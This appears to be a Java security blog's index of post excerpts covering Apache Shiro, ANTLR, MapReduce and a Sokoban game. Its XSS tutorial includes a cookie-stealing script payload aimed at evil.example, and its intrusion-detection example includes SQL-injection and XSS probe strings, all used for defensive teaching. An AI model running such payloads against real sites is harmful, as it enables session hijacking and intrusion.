Sunday, December 4, 2011

Apache Shiro Part 3 - Cryptography

Besides securing web pages and managing access rights, Apache Shiro also handles basic cryptography tasks. The framework is able to:
  • encrypt and decrypt data,
  • hash data,
  • generate random numbers.

Shiro does not implement any cryptographic algorithms itself; all computation is delegated to the Java Cryptography Extension (JCE) API. The benefit of using Shiro's wrappers instead of the raw JCE classes is ease of use and safer defaults. The crypto module works at a higher level of abstraction (no transformation strings, modes or padding to assemble by hand) and chooses settings such as salted, iterated hashing and a fresh random initialization vector per encryption that a caller would otherwise have to know to ask for. It does not relieve you of checking which defaults your Shiro version actually picks.
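The three tasks above, as an added example that is not code from the original post. It uses Shiro's own classes (Sha256Hash, SecureRandomNumberGenerator, AesCipherService from shiro-core 1.x); the stored-credential layout "saltHex:hashHex", the iteration count and the class name ShiroCryptoDemo are this example's choices.

```java
// Added example, not from the original post. Assumes shiro-core 1.x on the classpath.
// "saltHex:hashHex" storage format and HASH_ITERATIONS are this example's own choices.
import java.nio.charset.StandardCharsets;
import java.security.Key;
import java.security.MessageDigest;

import org.apache.shiro.codec.Hex;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.crypto.SecureRandomNumberGenerator;
import org.apache.shiro.crypto.hash.Sha256Hash;
import org.apache.shiro.util.ByteSource;

public class ShiroCryptoDemo {

    /** Work factor for the iterated hash; raise it as hardware gets faster. */
    private static final int HASH_ITERATIONS = 100_000;

    /** Backed by java.security.SecureRandom, not java.util.Random. */
    private static final SecureRandomNumberGenerator RNG = new SecureRandomNumberGenerator();

    /** Hashes a password with a fresh 16-byte random salt; returns "saltHex:hashHex". */
    public static String hashPassword(String password) {
        ByteSource salt = RNG.nextBytes(16);                          // new salt per credential
        Sha256Hash hash = new Sha256Hash(password, salt.getBytes(), HASH_ITERATIONS);
        return salt.toHex() + ":" + hash.toHex();
    }

    /** Recomputes the hash with the stored salt and compares without an early exit. */
    public static boolean verifyPassword(String password, String stored) {
        String[] parts = stored.split(":", 2);
        if (parts.length != 2) {
            return false;
        }
        byte[] salt = Hex.decode(parts[0]);
        byte[] expected = Hex.decode(parts[1]);
        byte[] actual = new Sha256Hash(password, salt, HASH_ITERATIONS).getBytes();
        return MessageDigest.isEqual(expected, actual);               // constant-time compare
    }

    public static void main(String[] args) {
        // 1. Hashing: salt and iterations are part of the constructor call, so they cannot be forgotten.
        String stored = hashPassword("correct horse battery staple");
        System.out.println("stored credential: " + stored);
        System.out.println("right password verifies: " + verifyPassword("correct horse battery staple", stored));
        System.out.println("wrong password verifies: " + verifyPassword("Tr0ub4dor&3", stored));

        // 2. Encryption: AesCipherService generates the key and a random IV for every encrypt() call,
        //    so the same plaintext encrypted twice gives different ciphertext (the IV is prepended).
        AesCipherService aes = new AesCipherService();
        Key key = aes.generateNewKey();
        byte[] plaintext = "secret note".getBytes(StandardCharsets.UTF_8);
        ByteSource ct1 = aes.encrypt(plaintext, key.getEncoded());
        ByteSource ct2 = aes.encrypt(plaintext, key.getEncoded());
        System.out.println("ciphertexts differ: " + !ct1.toHex().equals(ct2.toHex()));
        byte[] decrypted = aes.decrypt(ct1.getBytes(), key.getEncoded()).getBytes();
        System.out.println("round trip: " + new String(decrypted, StandardCharsets.UTF_8));

        // 3. Random tokens, e.g. for password-reset links, from the CSPRNG-backed generator.
        System.out.println("random token: " + RNG.nextBytes(32).toBase64());
    }
}
```

Two checks worth making before copying this into a real application: an iterated SHA-256 is a cheap hash, not a memory-hard password KDF, so where bcrypt, scrypt or Argon2 are available prefer them for stored passwords; and the block mode AesCipherService uses is whatever your Shiro release defaults to, so confirm it and remember that an unauthenticated mode such as CBC lets an attacker tamper with ciphertext undetected unless you add a MAC.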

Thursday, November 10, 2011

Project Report - JSSokoban

I have never worked on a bigger JavaScript project, I have never worked with 3D, and I have never written a game. Better late than never: I will create a 3D game in JavaScript. The whole project is less ambitious than it sounds; I will create a Sokoban clone.

Sokoban is a turn-based puzzle with simple rules and graphics. The player navigates a little robot through a warehouse. The warehouse contains walls, wooden boxes and destinations.
The game works in Firefox, Opera and Chrome. It is somewhat faster in Chrome.

Tuesday, October 25, 2011

MapReduce Questions and Answers

With all the hype and buzz surrounding NoSQL, I decided to have a look at it. I quickly found that there is no single NoSQL I could learn. Rather, there are many different solutions with different purposes and trade-offs. Those solutions tend to have one thing in common: data in NoSQL storage is usually processed using the MapReduce framework.

A search for MapReduce turned up scattered blog posts, some university course pages and one book that seems to contain almost everything the other sources did.

This post contains MapReduce questions and answers based on the book. Basically, if I were a student, these are the notes I would make to prepare for a test. If I were a teacher, this is what I would ask on the exam.

Thursday, September 29, 2011

ANTLR Tutorial - Expression Language

The ANTLR tool is useful any time you need to create a compiler, interpreter or parser for your own language. It takes a so-called grammar file as input and generates two classes: a lexer and a parser.

This post explains what a lexer is, what a parser is and how to write grammar files to generate them. By the end of the post, you will be able to compile any simple programming language into an abstract syntax tree.

Our example project, a boolean expression language, is written in Java and available on GitHub. Apart from that, everything explained in this post is language independent: the grammar file is the same whichever target language ANTLR generates code for.

Friday, August 26, 2011

ANTLR Tutorial - Hello Word

ANTLR stands for ANother Tool for Language Recognition. The tool generates the lexer and parser that form the front end of a compiler or interpreter for any computer language. Besides the obvious use, e.g. parsing a real 'big' programming language such as Java, PHP or SQL, it can help with smaller, more common tasks.

It is useful any time you need to evaluate expressions unknown at compile time, or to parse non-trivial user input or files in a weird format. Of course, it is possible to write a custom hand-made parser for any of these tasks. However, that usually takes much more time and effort. A little knowledge of a good parser generator may turn these time-consuming tasks into quick and easy exercises.

Wednesday, July 20, 2011

Testing for XSS Vulnerabilities - Choosing a Scanner

We have decided to introduce testing for security vulnerabilities into our web application development. The previous part introduced cross-site scripting, our web application and the expectations we have for this project.

In this part, we go through all the penetration testing tools we could find. Our goal is to find a suitable open source scanner. We wrote a mini review of each tool we found and picked the two scanners we will use.

Thursday, June 30, 2011

Testing for XSS Vulnerabilities - Introduction

Cross-site scripting (XSS) is the second most common type of attack on web applications (it was number two in the 2010 OWASP Top 10). It allows an attacker to execute scripts in the victim's browser and perform almost any action on the user's behalf. For example, the script may steal the session cookie, submit requests as the user or redirect the user to malicious sites.

This type of attack is relatively easy to perform and difficult to protect against. There are numerous different attack vectors, and an attacker needs only some knowledge of web technologies (JavaScript, CSS, HTML) to use any of them. Moreover, a single vulnerable output is enough to make the whole application vulnerable, because the injected script runs with the application's own origin and therefore with the user's session.
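What the scanners in this series look for, as an added example that is not code from the original post or its fictional project: a page that pastes a request parameter into HTML unescaped, next to the same page with the output escaped for the HTML body context. The class XssDemo, the render and escape functions and the attacker payload are all constructed for this illustration.

```java
// Added example, not from the original post. Plain Java, no servlet container needed;
// the functions and the PAYLOAD string are constructed for this illustration.
public class XssDemo {

    /** Constructed attacker input: exfiltrates the session cookie to a host the attacker controls. */
    static final String PAYLOAD =
        "<script>new Image().src='http://evil.example/?c='+document.cookie</script>";

    /** VULNERABLE: untrusted input is concatenated straight into the HTML body. */
    static String renderGreetingVulnerable(String name) {
        return "<p>Hello " + name + "</p>";
    }

    /** HARDENED: the same output with the HTML-significant characters escaped first. */
    static String renderGreetingEscaped(String name) {
        return "<p>Hello " + escapeHtml(name) + "</p>";
    }

    /** Minimal escaper for HTML body and quoted attribute contexts. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Crude scanner-style check: is the probe still present as live markup in the response? */
    static boolean isReflectedUnescaped(String page) {
        return page.contains("<script>");
    }

    public static void main(String[] args) {
        String vulnerable = renderGreetingVulnerable(PAYLOAD);
        String escaped = renderGreetingEscaped(PAYLOAD);
        System.out.println("vulnerable page: " + vulnerable);
        System.out.println("  script reflected: " + isReflectedUnescaped(vulnerable));   // true
        System.out.println("escaped page:    " + escaped);
        System.out.println("  script reflected: " + isReflectedUnescaped(escaped));      // false
    }
}
```

The escaper above is only correct for the HTML body and quoted attribute contexts; a value placed inside a JavaScript string, a URL or a CSS rule needs a different encoding, which is why every output location has to be reviewed separately and why one missed location is enough. In a real application use a maintained encoder library (for Java, the OWASP Java Encoder) rather than a hand-written switch, and mark the session cookie HttpOnly so that at least the cookie-theft payload above fails even where an injection slips through.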

This series of posts introduces XSS testing to a fictional development team working on a web project. This introduction describes both cross-site scripting and the fictional project's requirements.

Monday, May 30, 2011

AppSensor - Intrusion Detection

Imagine that you have created a nice web application and secured it as best you could. Users came, used it and everything was fine until someone stumbled upon a vulnerability in your application and exploited it. Of course, you then analyzed the logs and found that the bad guy had been looking for a vulnerability for weeks until he found one.

The creators of the AppSensor intrusion detection framework believe that the above situation should not happen. The application should not just lie there and let itself be beaten with SQL injection, XSS attacks and whatever else. It should take active measures to protect itself. Since the average attacker has to make many attempts before finding a vulnerability, it should be possible to detect the attempts while they are still failing, and respond before one succeeds.
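The premise in the paragraph above, as an added example that is not AppSensor's own code or API: the application reports each request that a legitimate client would never send as an event, counts events per user over a sliding window, and locks the account once a threshold is crossed. The class AttackDetector, its DetectionPoint names, the classify() heuristics and the probe strings are all constructed for this illustration; AppSensor has its own catalogue of detection points and responses.

```java
// Added example, not AppSensor's code. Class, enum values, classify() rules and
// the sample probes are constructed for this illustration.
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.Map;

public class AttackDetector {

    /** Illustrative detection points (this example's names, not AppSensor's catalogue). */
    public enum DetectionPoint { UNEXPECTED_PARAMETER, SQL_SYNTAX_IN_INPUT, HTML_IN_INPUT, AUTH_FAILURE }

    private final int threshold;                     // events within the window that trigger a lock
    private final long windowMillis;                 // sliding window length
    private final Map<String, Deque<Long>> eventsByUser = new HashMap<>();
    private final Map<String, Long> lockedUntil = new HashMap<>();

    public AttackDetector(int threshold, long windowMillis) {
        this.threshold = threshold;
        this.windowMillis = windowMillis;
    }

    /**
     * Called wherever the application notices input a legitimate client would never send.
     * Returns true when this event pushed the user over the threshold and locked the account.
     */
    public synchronized boolean report(String user, DetectionPoint point, long now) {
        System.out.println("event " + point + " from " + user);
        Deque<Long> times = eventsByUser.computeIfAbsent(user, u -> new ArrayDeque<>());
        times.addLast(now);
        while (!times.isEmpty() && now - times.peekFirst() > windowMillis) {
            times.pollFirst();                       // forget events older than the window
        }
        if (times.size() >= threshold) {
            lockedUntil.put(user, now + windowMillis);   // response: lock for one window
            times.clear();
            return true;
        }
        return false;
    }

    /** Checked before serving any request for the user. */
    public synchronized boolean isLocked(String user, long now) {
        Long until = lockedUntil.get(user);
        return until != null && now < until;
    }

    /** Crude stand-ins for real detection points; constructed for the demo only. */
    static DetectionPoint classify(String input) {
        String lower = input.toLowerCase();
        if (lower.contains("' or ") || lower.contains("--") || lower.contains("union select")) {
            return DetectionPoint.SQL_SYNTAX_IN_INPUT;
        }
        if (lower.contains("<script") || lower.contains("onerror=")) {
            return DetectionPoint.HTML_IN_INPUT;
        }
        return null;
    }

    public static void main(String[] args) {
        AttackDetector detector = new AttackDetector(3, 10 * 60 * 1000L);   // 3 events in 10 minutes
        long t = 0;

        // A false positive from a legitimate user costs one event, not a lock.
        DetectionPoint p = classify("see notes -- tomorrow");
        if (p != null) detector.report("alice", p, t);
        System.out.println("alice locked: " + detector.isLocked("alice", t));        // false

        // An attacker probing for injection and XSS trips several detection points in a row.
        String[] probes = { "' OR 1=1--", "admin'--", "<script>alert(1)</script>" };
        for (String probe : probes) {
            t += 30 * 1000L;                         // thirty seconds between attempts
            DetectionPoint dp = classify(probe);
            if (dp != null) detector.report("mallory", dp, t);
        }
        System.out.println("mallory locked: " + detector.isLocked("mallory", t));    // true
    }
}
```

The point of keying on the user (or session) rather than on the raw input is that a single odd request proves nothing, while three in ten minutes from one account is a pattern no normal client produces; the threshold and the response (lock, log out, step-up authentication, alert) are policy decisions the application owner makes, which is what a framework like AppSensor parameterizes.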

AppSensor - Integration with Shiro

AppSensor is an intrusion detection framework described in another post. The out-of-the-box version assumes that the underlying application supports the ESAPI interfaces. In this post, we take an application secured by the Shiro framework, which does not support ESAPI, and integrate it with AppSensor.

This post is only about the integration. It does not explain what AppSensor is, how to add it to an application or how to use it; all of that can be found in the AppSensor - Intrusion Detection post.

Monday, April 18, 2011

Apache Shiro Part 2 - Realms, Database and PGP Certificates

This is the second part of a series dedicated to Apache Shiro. We started the previous part with a simple unsecured web application. When we finished, the application had basic authentication and authorization: users could log in and log out, and all web pages and buttons had access rights assigned and enforced. Both authentication and authorization data were stored in a static configuration file.

As promised at the end of the last part, we will move the user account data to a database. In addition, we will give users the option to authenticate with PGP certificates. As a result, our application will have two alternative log-in options: log in with user name and password, and log in with a certificate. We will finish by making the alternative log-in options mandatory, so that a user must pass both.

Sunday, March 27, 2011

Apache Shiro Part 1 - Basics

Apache Shiro, originally called JSecurity, is a Java security framework. It was accepted into the Apache Incubator and became an Apache top-level project in 2010. It aims to be powerful and easy to use.

The project is in active development, with active mailing lists for both users and developers. The most important areas are documented on its web page. However, the documentation has a lot of gaps; it is not possible to learn to use most Shiro features from the documentation alone. Luckily, the code is well commented and, where I tried it, also easily readable.

Main Shiro features are:
  • authentication,
  • authorization,
  • cryptography,
  • session management.

In this article we try out and demonstrate various Shiro features. We start with a simple unsecured web application, then add security features to it. All code is available in the SimpleShiroSecuredApplication project on GitHub.